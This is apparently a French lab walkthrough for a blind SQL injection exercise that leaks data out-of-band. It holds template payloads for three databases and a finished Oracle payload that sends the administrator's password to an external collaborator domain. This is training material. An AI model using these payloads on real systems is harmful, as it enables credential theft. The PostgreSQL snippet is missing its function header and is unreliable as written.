Exfiltration de données via canal OOB en injection SQL

Blind SQL injection with out-of-band data exfiltration

Lab: Blind SQL injection with out-of-band data exfiltration | Web Security AcademyWebSecAcademy

Ce laboratoire contient une vulnérabilité d’injection SQL aveugle. L’application utilise un cookie de tracking pour l’analytics et exécute une requête SQL contenant la valeur du cookie soumis. La requête SQL est exécutée de façon asynchrone et n’affecte pas la réponse de l’application. Toutefois, il est possible de déclencher des interactions hors-bande (out-of-band) avec un domaine externe. La base de données contient une table distincte nommée users, avec des colonnes username et password. Il faut exploiter la vulnérabilité SQL aveugle pour découvrir le mot de passe de l’utilisateur administrator.

Oracle

SELECT EXTRACTVALUE(
  xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),
  '/l')
FROM dual

PostgresSQL

SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();

Mysql

SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'

Récupérer le mot de passe de l’administrateur (SELECT password FROM users WHERE username = 'administrator')

' union SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY %25 remote SYSTEM "http://'||(select password from users where username='administrator')||'.qnhdkeii23lhv8cats06caltuk0bo8cx.oastify.com/"> %25remote%3b]>'),'/l') FROM dual-- -

Mis à jour il y a 2 mois

Ce contenu vous a-t-il été utile ?